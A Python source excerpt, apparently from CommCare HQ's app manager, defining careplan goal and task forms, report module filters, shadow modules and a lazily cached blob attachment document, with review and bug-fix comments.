    if cls is not CareplanForm:
        return super(CareplanForm, cls).wrap(data)
    doc_type = data['doc_type']
    if doc_type == 'CareplanGoalForm':
        return CareplanGoalForm.wrap(data)
    if doc_type == 'CareplanTaskForm':
        return CareplanTaskForm.wrap(data)
    raise ValueError('Unexpected doc_type for CareplanForm', doc_type)
def add_stuff_to_xform(self, xform, build_profile_id=None):
    """Attach careplan-specific case blocks to the XForm."""
    super(CareplanForm, self).add_stuff_to_xform(xform, build_profile_id)
    xform.add_care_plan(self)

def get_case_updates(self, case_type):
    """Formatted property keys saved for *case_type*; empty for other types."""
    if case_type == self.case_type:
        format_key = self.get_case_property_name_formatter()
        return [format_key(*item) for item in self.case_updates().iteritems()]
    else:
        return []

def get_case_type(self):
    return self.case_type

def get_parent_case_type(self):
    # the containing module's case type
    return self._parent.case_type

def get_parent_types_and_contributed_properties(self, module_case_type, case_type):
    """Goal cases are children of the module case; task cases are children
    of goal cases."""
    parent_types = set()
    case_properties = set()
    if case_type == self.case_type:
        if case_type == CAREPLAN_GOAL:
            parent_types.add((module_case_type, 'parent'))
        elif case_type == CAREPLAN_TASK:
            parent_types.add((CAREPLAN_GOAL, 'goal'))
        case_properties.update(self.case_updates().keys())

    return parent_types, case_properties
def is_registration_form(self, case_type=None):
    """A careplan form registers a case when in 'create' mode and (when
    given) its case type matches."""
    if self.mode != 'create':
        return False
    return not case_type or self.case_type == case_type
def update_app_case_meta(self, app_case_meta):
    """Register this form's saves, preloads, opener and closer on
    *app_case_meta*."""
    from corehq.apps.reports.formdetails.readable import FormQuestionResponse
    questions = {
        q['value']: FormQuestionResponse(q)
        for q in self.get_questions(self.get_app().langs, include_translations=True)
    }
    meta = app_case_meta.get_type(self.case_type)
    for name, question_path in self.case_updates().items():
        self.add_property_save(
            app_case_meta,
            self.case_type,
            name,
            questions,
            question_path
        )
    # NOTE(review): iterates as (name, path) whereas AdvancedForm's preload
    # loop iterates as (path, name) — confirm case_preload maps name->path
    for name, question_path in self.case_preload.items():
        self.add_property_load(
            app_case_meta,
            self.case_type,
            name,
            questions,
            question_path
        )
    # careplan forms always open; they close when close_path answers 'yes'
    meta.add_opener(self.unique_id, FormActionCondition(
        type='always',
    ))
    meta.add_closer(self.unique_id, FormActionCondition(
        type='if',
        question=self.close_path,
        answer='yes',
    ))
class CareplanGoalForm(CareplanForm):
    """Careplan form that creates or updates goal cases."""
    case_type = CAREPLAN_GOAL
    name_path = StringProperty(required=True, default='/data/name')
    date_followup_path = StringProperty(required=True, default='/data/date_followup')
    description_path = StringProperty(required=True, default='/data/description')
    close_path = StringProperty(required=True, default='/data/close_goal')

    @classmethod
    def new_form(cls, lang, name, mode):
        """Create a goal form for *mode* ('create'/'update').

        :return: (form, XForm template source) tuple
        """
        action = 'Update' if mode == 'update' else 'New'
        form = CareplanGoalForm(mode=mode)
        name = name or '%s Careplan %s' % (action, CAREPLAN_CASE_NAMES[form.case_type])
        form.name = {lang: name}
        if mode == 'update':
            # the update template nests description in a group
            form.description_path = '/data/description_group/description'
        source = load_form_template('%s_%s.xml' % (form.case_type, mode))
        return form, source

    def case_updates(self):
        """Case properties this form saves: custom updates plus fixed paths."""
        changes = self.custom_case_updates.copy()
        changes.update({
            'date_followup': self.date_followup_path,
            'description': self.description_path,
        })
        return changes

    def get_fixed_questions(self):
        """Describe the fixed questions for UI display, depending on mode."""
        def q(name, case_key, label):
            return {
                'name': name,
                'key': case_key,
                'label': label,
                'path': self[name]
            }
        questions = [
            q('description_path', 'description', _('Description')),
            q('date_followup_path', 'date_followup', _('Followup date')),
        ]
        if self.mode == 'create':
            return [q('name_path', 'name', _('Name'))] + questions
        else:
            return questions + [q('close_path', 'close', _('Close if'))]
class CareplanTaskForm(CareplanForm):
    """Careplan form that creates or updates task cases."""
    case_type = CAREPLAN_TASK
    name_path = StringProperty(required=True, default='/data/task_repeat/name')
    date_followup_path = StringProperty(required=True, default='/data/date_followup')
    description_path = StringProperty(required=True, default='/data/description')
    latest_report_path = StringProperty(required=True, default='/data/progress_group/progress_update')
    close_path = StringProperty(required=True, default='/data/task_complete')

    @classmethod
    def new_form(cls, lang, name, mode):
        """Create a task form for *mode* ('create'/'update').

        :return: (form, XForm template source) tuple
        """
        action = 'Update' if mode == 'update' else 'New'
        form = CareplanTaskForm(mode=mode)
        name = name or '%s Careplan %s' % (action, CAREPLAN_CASE_NAMES[form.case_type])
        form.name = {lang: name}
        if mode == 'create':
            # the create template nests these inside the task repeat group
            form.date_followup_path = '/data/task_repeat/date_followup'
            form.description_path = '/data/task_repeat/description'
        source = load_form_template('%s_%s.xml' % (form.case_type, mode))
        return form, source

    def case_updates(self):
        """Case properties this form saves; 'description' only on create,
        'latest_report' only on update."""
        changes = self.custom_case_updates.copy()
        changes.update({
            'date_followup': self.date_followup_path,
        })
        if self.mode == 'create':
            changes['description'] = self.description_path
        else:
            changes['latest_report'] = self.latest_report_path
        return changes

    def get_fixed_questions(self):
        """Describe the fixed questions for UI display, depending on mode."""
        def q(name, case_key, label):
            return {
                'name': name,
                'key': case_key,
                'label': label,
                'path': self[name]
            }
        questions = [
            q('date_followup_path', 'date_followup', _('Followup date')),
        ]
        if self.mode == 'create':
            return [
                q('name_path', 'name', _('Name')),
                q('description_path', 'description', _('Description')),
            ] + questions
        else:
            return questions + [
                q('latest_report_path', 'latest_report', _('Latest report')),
                q('close_path', 'close', _('Close if')),
            ]
class CareplanModule(ModuleBase):
    """
    A set of forms and configuration for managing the Care Plan workflow.
    """
    module_type = 'careplan'
    parent_select = SchemaProperty(ParentSelect)

    display_separately = BooleanProperty(default=False)
    forms = SchemaListProperty(CareplanForm)
    goal_details = SchemaProperty(DetailPair)
    task_details = SchemaProperty(DetailPair)
@classmethod
def new_module(cls, name, lang, target_module_id, target_case_type):
    """Create a CareplanModule parented (via parent_select) to another module.

    :param target_module_id: module whose cases are the careplan parents
    :param target_case_type: case type of those parent cases
    :return: the new module, with a unique id already assigned
    """
    lang = lang or 'en'
    module = CareplanModule(
        name={lang: name or ugettext("Care Plan")},
        parent_select=ParentSelect(
            active=True,
            relationship='parent',
            module_id=target_module_id
        ),
        case_type=target_case_type,
        goal_details=DetailPair(
            short=cls._get_detail(lang, 'goal_short'),
            long=cls._get_detail(lang, 'goal_long'),
        ),
        task_details=DetailPair(
            short=cls._get_detail(lang, 'task_short'),
            long=cls._get_detail(lang, 'task_long'),
        )
    )
    module.get_or_create_unique_id()
    return module
@classmethod
def _get_detail(cls, lang, detail_type):
    """Build the default goal/task case Detail for *detail_type*.

    Long details additionally show the description; the long task detail
    also shows the latest report.

    Bug fix: the last-update column was gated on ``detail_type ==
    'tasks_long'``, which can never match — new_module/get_details only
    pass 'task_long' — so the column was dead code.
    """
    header = ugettext('Goal') if detail_type.startswith('goal') else ugettext('Task')
    columns = [
        DetailColumn(
            format='plain',
            header={lang: header},
            field='name',
            model='case'),
        DetailColumn(
            format='date',
            header={lang: ugettext("Followup")},
            field='date_followup',
            model='case')]

    if detail_type.endswith('long'):
        columns.append(DetailColumn(
            format='plain',
            header={lang: ugettext("Description")},
            field='description',
            model='case'))

    if detail_type == 'task_long':
        columns.append(DetailColumn(
            format='plain',
            header={lang: ugettext("Last update")},
            field='latest_report',
            model='case'))

    return Detail(type=detail_type, columns=columns)
def add_insert_form(self, from_module, form, index=None, with_source=False):
    """Add a CareplanForm to this module.

    :param from_module: unused; kept for signature parity with other modules
    :param with_source: unused; kept for signature parity with other modules
    :raises IncompatibleFormTypeException: for non-careplan forms
    :return: the form as bound to this module

    Bug fix: ``index`` was tested for truthiness (``if index:``), so
    inserting at position 0 appended instead, and the return used
    ``index or -1`` which fetched the wrong form for index 0.
    """
    if not isinstance(form, CareplanForm):
        raise IncompatibleFormTypeException()

    if index is not None:
        self.forms.insert(index, form)
    else:
        self.forms.append(form)
    return self.get_form(-1 if index is None else index)
def requires_case_details(self):
    # careplan modules always show case details
    return True

def get_case_types(self):
    """This module's case type plus every form's case type."""
    return set([self.case_type]) | set(f.case_type for f in self.forms)
def get_form_by_type(self, case_type, mode):
    """Return the first form matching *case_type* and *mode*, or None."""
    matches = (form for form in self.get_forms()
               if form.case_type == case_type and form.mode == mode)
    return next(matches, None)
def get_details(self):
    """Yield (detail name, Detail, enabled?) tuples for suite generation."""
    return (
        ('%s_short' % CAREPLAN_GOAL, self.goal_details.short, True),
        ('%s_long' % CAREPLAN_GOAL, self.goal_details.long, True),
        ('%s_short' % CAREPLAN_TASK, self.task_details.short, True),
        ('%s_long' % CAREPLAN_TASK, self.task_details.long, True),
    )
def get_case_errors(self, needs_case_type, needs_case_detail, needs_referral_detail=False):
    """Generator of case-configuration error dicts for this module.

    needs_referral_detail is accepted for signature parity but unused here.
    """
    module_info = self.get_module_info()

    if needs_case_type and not self.case_type:
        yield {
            'type': 'no case type',
            'module': module_info,
        }

    if needs_case_detail:
        if not self.goal_details.short.columns:
            yield {
                'type': 'no case detail for goals',
                'module': module_info,
            }
        if not self.task_details.short.columns:
            yield {
                'type': 'no case detail for tasks',
                'module': module_info,
            }
        columns = self.goal_details.short.columns + self.goal_details.long.columns
        columns += self.task_details.short.columns + self.task_details.long.columns
        errors = self.validate_detail_columns(columns)
        for error in errors:
            yield error

def validate_for_build(self):
    """Base build errors, plus one when the module has no forms at all."""
    errors = super(CareplanModule, self).validate_for_build()
    if not self.forms:
        errors.append({
            'type': 'no forms',
            'module': self.get_module_info(),
        })
    return errors
class ReportGraphConfig(DocumentSchema):
    """Configuration for rendering a mobile report as a graph."""
    graph_type = StringProperty(
        choices=[
            'bar',
            'time',
            'xy',
        ],
        default='bar',
        required=True,
    )
    # per-series display options, keyed by series
    series_configs = DictProperty(DictProperty)
    # graph-level display options
    config = DictProperty()
class ReportAppFilter(DocumentSchema):
    """Base class for mobile report filters; wrap() dispatches on doc_type."""
    @classmethod
    def wrap(cls, data):
        if cls is ReportAppFilter:
            doc_type = data['doc_type']
            doc_type_to_filter_class = {
                'AutoFilter': AutoFilter,
                'CustomDataAutoFilter': CustomDataAutoFilter,
                'StaticChoiceFilter': StaticChoiceFilter,
                'StaticChoiceListFilter': StaticChoiceListFilter,
                'StaticDatespanFilter': StaticDatespanFilter,
                'CustomDatespanFilter': CustomDatespanFilter,
                'CustomMonthFilter': CustomMonthFilter,
                'MobileSelectFilter': MobileSelectFilter,
                'AncestorLocationTypeFilter': AncestorLocationTypeFilter,
                'NumericFilter': NumericFilter,
            }
            try:
                klass = doc_type_to_filter_class[doc_type]
            except KeyError:
                raise ValueError('Unexpected doc_type for ReportAppFilter', doc_type)
            else:
                return klass.wrap(data)
        else:
            return super(ReportAppFilter, cls).wrap(data)

    def get_filter_value(self, user, ui_filter):
        # subclasses must compute the filter value for *user*
        raise NotImplementedError
def _filter_by_case_sharing_group_id(user, ui_filter):
from corehq.apps.reports_core.filters import Choice
return [
Choice(value=group._id, display=None)
for group in user.get_case_sharing_groups()
]
def _filter_by_location_id(user, ui_filter):
return ui_filter.value(**{ui_filter.name: user.location_id})
def _filter_by_username(user, ui_filter):
    """Return a Choice carrying the restoring user's raw username."""
    from corehq.apps.reports_core.filters import Choice
    # Note: returns a single Choice, not a list (unlike the group filter).
    return Choice(value=user.raw_username, display=None)
def _filter_by_user_id(user, ui_filter):
    """Return a Choice carrying the restoring user's document id."""
    from corehq.apps.reports_core.filters import Choice
    # Note: returns a single Choice, not a list (unlike the group filter).
    return Choice(value=user._id, display=None)
def _filter_by_parent_location_id(user, ui_filter):
location = user.sql_location
location_parent = location.parent.location_id if location and location.parent else None
return ui_filter.value(**{ui_filter.name: location_parent})
# Maps an AutoFilter ``filter_type`` value to the function that computes
# the filter's value for a given restoring user.
_filter_type_to_func = {
    'case_sharing_group': _filter_by_case_sharing_group_id,
    'location_id': _filter_by_location_id,
    'parent_location_id': _filter_by_parent_location_id,
    'username': _filter_by_username,
    'user_id': _filter_by_user_id,
}
class AutoFilter(ReportAppFilter):
    """Filter whose value is derived automatically from the restoring user.

    ``filter_type`` selects one of the strategies registered in
    ``_filter_type_to_func`` (user id, username, location, case-sharing
    groups, ...).
    """

    # ``choices`` is materialized as a list: ``dict.keys()`` is a view on
    # Python 3 and a throwaway list on Python 2; an explicit list is stable
    # for schema introspection/serialization either way.
    filter_type = StringProperty(choices=list(_filter_type_to_func))

    def get_filter_value(self, user, ui_filter):
        """Delegate to the strategy registered for ``filter_type``."""
        return _filter_type_to_func[self.filter_type](user, ui_filter)
class CustomDataAutoFilter(ReportAppFilter):
    """Filter whose value is pulled from the restoring user's custom data."""

    # Name of the user-data field whose value feeds the report filter.
    custom_data_property = StringProperty()

    def get_filter_value(self, user, ui_filter):
        from corehq.apps.reports_core.filters import Choice
        # KeyError here means the user is missing the configured property.
        return Choice(value=user.user_data[self.custom_data_property], display=None)
class StaticChoiceFilter(ReportAppFilter):
    """Filter pinned to a single fixed choice value."""

    select_value = StringProperty()

    def get_filter_value(self, user, ui_filter):
        from corehq.apps.reports_core.filters import Choice
        # Returned as a one-element list of choices.
        return [Choice(value=self.select_value, display=None)]
class StaticChoiceListFilter(ReportAppFilter):
    """Filter pinned to a fixed list of choice values."""

    value = StringListProperty()

    def get_filter_value(self, user, ui_filter):
        from corehq.apps.reports_core.filters import Choice
        choices = []
        for selected_value in self.value:
            choices.append(Choice(value=selected_value, display=None))
        return choices
class StaticDatespanFilter(ReportAppFilter):
    """Filter pinned to one of the standard relative date ranges."""

    date_range = StringProperty(
        choices=[
            'last7',
            'last30',
            'thismonth',
            'lastmonth',
            'lastyear',
        ],
        required=True,
    )

    def get_filter_value(self, user, ui_filter):
        # Resolve the named range to concrete dates as of "now".
        start_date, end_date = get_daterange_start_end_dates(self.date_range)
        return DateSpan(startdate=start_date, enddate=end_date)
class CustomDatespanFilter(ReportAppFilter):
    """Filter for a date window defined relative to today.

    ``date_number`` (and ``date_number2`` for ``between``) are numbers of
    days in the past; ``operator`` decides how they bound the span.  An
    open end of the span is represented as ``None``.
    """

    operator = StringProperty(
        choices=[
            '=',
            '<=',
            '>=',
            '>',
            '<',
            'between'
        ],
        required=True,
    )
    # Number of days ago, stored as a string.
    date_number = StringProperty(required=True)
    # Second bound; only consulted when operator == 'between'.
    date_number2 = StringProperty()

    def get_filter_value(self, user, ui_filter):
        today = datetime.date.today()
        start_date = end_date = None
        days = int(self.date_number)
        if self.operator == 'between':
            days2 = int(self.date_number2)
            # allows user to have specified the two numbers in either order
            if days > days2:
                end = days2
                start = days
            else:
                start = days2
                end = days
            # The larger "days ago" value is the earlier (start) date.
            start_date = today - datetime.timedelta(days=start)
            end_date = today - datetime.timedelta(days=end)
        elif self.operator == '=':
            # Exactly N days ago: a single-day span.
            start_date = end_date = today - datetime.timedelta(days=days)
        elif self.operator == '>=':
            # At least N days ago: open-ended into the past.
            start_date = None
            end_date = today - datetime.timedelta(days=days)
        elif self.operator == '<=':
            # At most N days ago: from that day up to today.
            start_date = today - datetime.timedelta(days=days)
            end_date = None
        elif self.operator == '<':
            # Strictly fewer than N days ago.
            start_date = today - datetime.timedelta(days=days - 1)
            end_date = None
        elif self.operator == '>':
            # Strictly more than N days ago.
            start_date = None
            end_date = today - datetime.timedelta(days=days + 1)
        return DateSpan(startdate=start_date, enddate=end_date)
def is_lte(integer):
    """Build a validator asserting that a value is <= ``integer``."""
    def validate(value):
        if value > integer:
            raise BadValueError('Value must be less than or equal to {}'.format(integer))
    return validate
def is_gte(integer):
    """Build a validator asserting that a value is >= ``integer``."""
    def validate(value):
        if value < integer:
            raise BadValueError('Value must be greater than or equal to {}'.format(integer))
    return validate
class CustomMonthFilter(ReportAppFilter):
    """
    Filter by months that start on a day number other than 1

    See [FB 215656](http://manage.dimagi.com/default.asp?215656)
    """
    # Values for start_of_month < 1 specify the number of days from the end of the month. Values capped at
    # len(February).
    start_of_month = IntegerProperty(
        required=True,
        validators=(is_gte(-27), is_lte(28))
    )
    # DateSpan to return i.t.o. number of months to go back
    period = IntegerProperty(
        default=DEFAULT_MONTH_FILTER_PERIOD_LENGTH,
        validators=(is_gte(0),)
    )

    @classmethod
    def wrap(cls, doc):
        # Coerce legacy string values to ints before schema wrapping.
        doc['start_of_month'] = int(doc['start_of_month'])
        if 'period' in doc:
            doc['period'] = int(doc['period'] or DEFAULT_MONTH_FILTER_PERIOD_LENGTH)
        return super(CustomMonthFilter, cls).wrap(doc)

    def get_filter_value(self, user, ui_filter):
        def get_last_month(this_month):
            # The last day of the month preceding ``this_month``.
            return datetime.date(this_month.year, this_month.month, 1) - datetime.timedelta(days=1)

        def get_last_day(date):
            # Number of days in ``date``'s month.
            _, last_day = calendar.monthrange(date.year, date.month)
            return last_day

        # Find the start and end dates of period 0
        start_of_month = int(self.start_of_month)
        end_date = datetime.date.today()
        # Negative/zero start_of_month counts back from the month's last day.
        start_day = start_of_month if start_of_month > 0 else get_last_day(end_date) + start_of_month
        # If today is before this month's start day, period 0 began last month.
        end_of_month = end_date if end_date.day >= start_day else get_last_month(end_date)
        start_date = datetime.date(end_of_month.year, end_of_month.month, start_day)
        # Loop over months backwards for period > 0
        for i in range(int(self.period)):
            end_of_month = get_last_month(end_of_month)
            end_date = start_date - datetime.timedelta(days=1)
            start_day = start_of_month if start_of_month > 0 else get_last_day(end_of_month) + start_of_month
            start_date = datetime.date(end_of_month.year, end_of_month.month, start_day)
        return DateSpan(startdate=start_date, enddate=end_date)
class MobileSelectFilter(ReportAppFilter):
    """Filter whose value is picked by the user on the device; nothing is
    pre-populated server-side."""

    def get_filter_value(self, user, ui_filter):
        return None
class AncestorLocationTypeFilter(ReportAppFilter):
    """Filter by the id of the user's ancestor location of a given type."""

    # Name of the location type to look for among the user's ancestors.
    ancestor_location_type_name = StringProperty()

    def get_filter_value(self, user, ui_filter):
        from corehq.apps.locations.models import SQLLocation
        try:
            # include_self=True: the user's own location counts as a candidate.
            ancestor = user.sql_location.get_ancestors(include_self=True).\
                get(location_type__name=self.ancestor_location_type_name)
        except (AttributeError, SQLLocation.DoesNotExist):
            # user.sql_location is None, or location does not have an ancestor of that type
            return None
        return ancestor.location_id
class NumericFilter(ReportAppFilter):
    """Filter comparing a numeric report column against a fixed operand."""

    # BUGFIX: the original line ended with a stray trailing comma, which
    # bound ``operator`` to a one-element *tuple* containing the
    # StringProperty rather than to the property itself.
    operator = StringProperty(choices=['=', '!=', '<', '<=', '>', '>='])
    operand = FloatProperty()

    @classmethod
    def wrap(cls, doc):
        # Coerce legacy string operands to floats before schema wrapping.
        doc['operand'] = float(doc['operand'])
        return super(NumericFilter, cls).wrap(doc)

    def get_filter_value(self, user, ui_filter):
        return {
            'operator': self.operator,
            'operand': self.operand,
        }
class ReportAppConfig(DocumentSchema):
    """
    Class for configuring how a user configurable report shows up in an app
    """
    report_id = StringProperty(required=True)
    header = DictProperty()
    localized_description = DictProperty()
    # XPath expression evaluated on the device to produce the description.
    xpath_description = StringProperty()
    use_xpath_description = BooleanProperty(default=False)
    graph_configs = DictProperty(ReportGraphConfig)
    filters = SchemaDictProperty(ReportAppFilter)
    # Stable identifier used to reference this config from the suite.
    uuid = StringProperty(required=True)

    # Per-instance cache for the wrapped report config; set by ``report()``.
    _report = None

    def __init__(self, *args, **kwargs):
        super(ReportAppConfig, self).__init__(*args, **kwargs)
        if not self.uuid:
            self.uuid = random_hex()

    @classmethod
    def wrap(cls, doc):
        # for backwards compatibility with apps that have localized or xpath descriptions
        old_description = doc.get('description')
        if old_description:
            if isinstance(old_description, basestring) and not doc.get('xpath_description'):
                doc['xpath_description'] = old_description
            elif isinstance(old_description, dict) and not doc.get('localized_description'):
                doc['localized_description'] = old_description
        if not doc.get('xpath_description'):
            # Default to an xpath expression that evaluates to the empty string.
            doc['xpath_description'] = '""'
        return super(ReportAppConfig, cls).wrap(doc)

    def report(self, domain):
        # NOTE(review): the cache ignores ``domain`` — a second call with a
        # different domain would return the first domain's report; confirm
        # callers always pass the same domain.
        if self._report is None:
            from corehq.apps.userreports.models import get_report_config
            self._report = get_report_config(self.report_id, domain)[0]
        return self._report
class ReportModule(ModuleBase):
    """
    Module for user configurable reports
    """
    module_type = 'report'

    report_configs = SchemaListProperty(ReportAppConfig)
    # Report modules have no forms of their own.
    forms = []
    _loaded = False

    @property
    @memoized
    def reports(self):
        """The wrapped report configurations this module refers to."""
        from corehq.apps.userreports.models import get_report_configs
        return get_report_configs([r.report_id for r in self.report_configs], self.get_app().domain)

    @classmethod
    def new_module(cls, name, lang):
        """Create an unsaved ReportModule with a fresh unique id."""
        module = ReportModule(
            name={(lang or 'en'): name or ugettext("Reports")},
            case_type='',
        )
        module.get_or_create_unique_id()
        return module

    def get_details(self):
        from .suite_xml.features.mobile_ucr import ReportModuleSuiteHelper
        return ReportModuleSuiteHelper(self).get_details()

    def get_custom_entries(self):
        from .suite_xml.features.mobile_ucr import ReportModuleSuiteHelper
        return ReportModuleSuiteHelper(self).get_custom_entries()

    def get_menus(self, supports_module_filter=False):
        """Yield the localized suite menu for this module, with one command
        per configured report."""
        kwargs = {}
        if supports_module_filter:
            kwargs['relevant'] = interpolate_xpath(self.module_filter)

        menu = suite_models.LocalizedMenu(
            id=id_strings.menu_id(self),
            menu_locale_id=id_strings.module_locale(self),
            media_image=bool(len(self.all_image_paths())),
            media_audio=bool(len(self.all_audio_paths())),
            image_locale_id=id_strings.module_icon_locale(self),
            audio_locale_id=id_strings.module_audio_locale(self),
            **kwargs
        )
        menu.commands.extend([
            suite_models.Command(id=id_strings.report_command(config.uuid))
            for config in self.report_configs
        ])
        yield menu

    def check_report_validity(self):
        """
        returns is_valid, valid_report_configs

        If any report doesn't exist, is_valid is False, otherwise True
        valid_report_configs is a list of all report configs that refer to existing reports
        """
        try:
            all_report_ids = [report._id for report in self.reports]
            valid_report_configs = [report_config for report_config in self.report_configs
                                    if report_config.report_id in all_report_ids]
            is_valid = (len(valid_report_configs) == len(self.report_configs))
        except ReportConfigurationNotFoundError:
            valid_report_configs = []  # assuming that if one report is in a different domain, they all are
            is_valid = False

        return namedtuple('ReportConfigValidity', 'is_valid valid_report_configs')(
            is_valid=is_valid,
            valid_report_configs=valid_report_configs
        )

    def validate_for_build(self):
        """Extend base validation with a check that every report config
        points at an existing report."""
        errors = super(ReportModule, self).validate_for_build()
        if not self.check_report_validity().is_valid:
            errors.append({
                'type': 'report config ref invalid',
                'module': self.get_module_info()
            })
        return errors
class ShadowModule(ModuleBase, ModuleDetailsMixin):
    """
    A module that acts as a shortcut to another module. This module has its own
    settings (name, icon/audio, filter, etc.) and its own case list/detail, but
    inherits case type and forms from its source module.
    """
    module_type = 'shadow'

    # Unique id of the module whose forms/case type this module mirrors.
    source_module_id = StringProperty()
    # Shadow modules own no forms; they borrow the source module's.
    forms = []
    # Source-module form ids left out of this module's menu.
    excluded_form_ids = SchemaListProperty()
    case_details = SchemaProperty(DetailPair)
    ref_details = SchemaProperty(DetailPair)
    put_in_root = BooleanProperty(default=False)
    case_list = SchemaProperty(CaseList)
    referral_list = SchemaProperty(CaseList)
    task_list = SchemaProperty(CaseList)
    parent_select = SchemaProperty(ParentSelect)

    get_forms = IndexedSchema.Getter('forms')

    @classmethod
    def wrap(cls, data):
        data = cls.wrap_details(data)
        return super(ShadowModule, cls).wrap(data)

    @property
    def source_module(self):
        """The module this shadow points at, or None if unset or missing."""
        if self.source_module_id:
            try:
                return self._parent.get_module_by_unique_id(self.source_module_id)
            except ModuleNotFoundException:
                pass
        return None

    @property
    def case_type(self):
        # Inherited from the source module.
        if not self.source_module:
            return None
        return self.source_module.case_type

    @property
    def requires(self):
        if not self.source_module:
            return 'none'
        return self.source_module.requires

    @property
    def root_module_id(self):
        if not self.source_module:
            return None
        return self.source_module.root_module_id

    def get_suite_forms(self):
        """The source module's forms, minus any explicitly excluded ones."""
        if not self.source_module:
            return []
        return [f for f in self.source_module.get_forms() if f.unique_id not in self.excluded_form_ids]

    @parse_int([1])
    def get_form(self, i):
        # Shadow modules have no forms of their own.
        return None

    def requires_case_details(self):
        if not self.source_module:
            return False
        return self.source_module.requires_case_details()

    def get_case_types(self):
        if not self.source_module:
            return []
        return self.source_module.get_case_types()

    @memoized
    def get_subcase_types(self):
        if not self.source_module:
            return []
        return self.source_module.get_subcase_types()

    @memoized
    def all_forms_require_a_case(self):
        # NOTE(review): returns [] (not False) when there is no source
        # module; both are falsy, but confirm callers treat them alike.
        if not self.source_module:
            return []
        return self.source_module.all_forms_require_a_case()

    @classmethod
    def new_module(cls, name, lang):
        """Create an unsaved ShadowModule with a default 'Name' case-detail
        column and a fresh unique id."""
        lang = lang or 'en'
        detail = Detail(
            columns=[DetailColumn(
                format='plain',
                header={(lang or 'en'): ugettext("Name")},
                field='name',
                model='case',
            )]
        )
        module = ShadowModule(
            name={(lang or 'en'): name or ugettext("Untitled Module")},
            case_details=DetailPair(
                short=Detail(detail.to_json()),
                long=Detail(detail.to_json()),
            ),
        )
        module.get_or_create_unique_id()
        return module

    def validate_for_build(self):
        """Extend base validation with detail checks and a check that a
        source module is configured and resolvable."""
        errors = super(ShadowModule, self).validate_for_build()
        errors += self.validate_details_for_build()
        if not self.source_module:
            errors.append({
                'type': 'no source module id',
                'module': self.get_module_info()
            })
        return errors
class LazyBlobDoc(BlobMixin):
    """LazyAttachmentDoc for blob db

    Cache blobs in local memory (for this request)
    and in django cache (for the next few requests)
    and commit to couchdb.

    See also `dimagi.utils.couch.lazy_attachment_doc.LazyAttachmentDoc`

    Cache strategy:
    - on fetch, check in local memory, then cache
    - if both are a miss, fetch from couchdb and store in both
    - after an attachment is committed to the blob db and the
      save has succeeded, save the attachment in the cache
    """
    migrating_blobs_from_couch = True

    def __init__(self, *args, **kwargs):
        super(LazyBlobDoc, self).__init__(*args, **kwargs)
        # Attachments queued to be written to the doc on the next save().
        self._LAZY_ATTACHMENTS = {}
        # to cache fetched attachments
        # these we do *not* send back down upon save
        self._LAZY_ATTACHMENTS_CACHE = {}

    @classmethod
    def wrap(cls, data):
        if "_attachments" in data:
            data = data.copy()
            attachments = data.pop("_attachments").copy()
            if cls.migrating_blobs_from_couch:
                # preserve stubs so couch attachments don't get deleted on save
                stubs = {}
                for name, value in list(attachments.items()):
                    if isinstance(value, dict) and "stub" in value:
                        stubs[name] = attachments.pop(name)
                if stubs:
                    data["_attachments"] = stubs
        else:
            attachments = None
        self = super(LazyBlobDoc, cls).wrap(data)
        if attachments:
            # Inline (non-stub) attachment content is queued for lazy save.
            for name, attachment in attachments.items():
                if isinstance(attachment, basestring):
                    info = {"content": attachment}
                else:
                    raise ValueError("Unknown attachment format: {!r}"
                                     .format(attachment))
                self.lazy_put_attachment(name=name, **info)
        return self

    def __attachment_cache_key(self, name):
        # Keyed on doc id + attachment name.
        return u'lazy_attachment/{id}/{name}'.format(id=self.get_id, name=name)

    def __set_cached_attachment(self, name, content):
        # Store in the django cache (one day) and the request-local cache.
        cache.set(self.__attachment_cache_key(name), content, timeout=60 * 60 * 24)
        self._LAZY_ATTACHMENTS_CACHE[name] = content

    def __get_cached_attachment(self, name):
        try:
            # it has been fetched already during this request
            content = self._LAZY_ATTACHMENTS_CACHE[name]
        except KeyError:
            content = cache.get(self.__attachment_cache_key(name))
            if content is not None:
                self._LAZY_ATTACHMENTS_CACHE[name] = content
        return content

    def put_attachment(self, content, name=None, *args, **kw):
        # Invalidate both cache layers before writing through.
        cache.delete(self.__attachment_cache_key(name))
        self._LAZY_ATTACHMENTS_CACHE.pop(name, None)
        return super(LazyBlobDoc, self).put_attachment(content, name, *args, **kw)

    def lazy_put_attachment(self, content, name=None, content_type=None,
                            content_length=None):
        """
        Ensure the attachment is available through lazy_fetch_attachment
        and that upon self.save(), the attachments are put to the doc as well
        """
        self._LAZY_ATTACHMENTS[name] = {
            'content': content,
            'content_type': content_type,
            'content_length': content_length,
        }

    def lazy_fetch_attachment(self, name):
        # it has been put/lazy-put already during this request
        if name in self._LAZY_ATTACHMENTS:
            content = self._LAZY_ATTACHMENTS[name]['content']
        else:
            content = self.__get_cached_attachment(name)

            if content is None:
                try:
                    content = self.fetch_attachment(name)
                except ResourceNotFound as e:
                    # django cache will pickle this exception for you
                    # but e.response isn't picklable
                    if hasattr(e, 'response'):
                        del e.response
                    # Cache the miss (as the exception object) so repeated
                    # lookups of a missing attachment skip couch.
                    content = e
                    raise
                finally:
                    self.__set_cached_attachment(name, content)

        if isinstance(content, ResourceNotFound):
            # A cached negative result: re-raise as if freshly fetched.
            raise content

        return content

    def lazy_list_attachments(self):
        # Union of lazily-queued attachment names and committed blob names.
        keys = set()
        keys.update(getattr(self, '_LAZY_ATTACHMENTS', None) or {})
        keys.update(self.blobs or {})
        return keys

    def save(self, **params):
        def super_save():
            super(LazyBlobDoc, self).save(**params)

        if self._LAZY_ATTACHMENTS:
            # Commit queued attachments and the doc atomically.
            with self.atomic_blobs(super_save):
                for name, info in self._LAZY_ATTACHMENTS.items():
                    if not info['content_type']:
                        # Guess a content type from the file name.
                        info['content_type'] = ';'.join(filter(None, guess_type(name)))
                    super(LazyBlobDoc, self).put_attachment(name=name, **info)
            # super_save() has succeeded by now
            for name, info in self._LAZY_ATTACHMENTS.items():
                self.__set_cached_attachment(name, info['content'])
            self._LAZY_ATTACHMENTS.clear()
        else:
            super_save()
class VersionedDoc(LazyBlobDoc):
    """
    A document that keeps an auto-incrementing version number, knows how to make copies of itself,
    delete a copy of itself, and revert back to an earlier copy of itself.
    """
    domain = StringProperty()
    # _id of the doc this one was copied from; None for the primary doc.
    copy_of = StringProperty()
    # Auto-incremented on each save of the primary doc.
    version = IntegerProperty()
    short_url = StringProperty()
    short_odk_url = StringProperty()
    short_odk_media_url = StringProperty()

    # Fields stripped when exporting/importing app source.
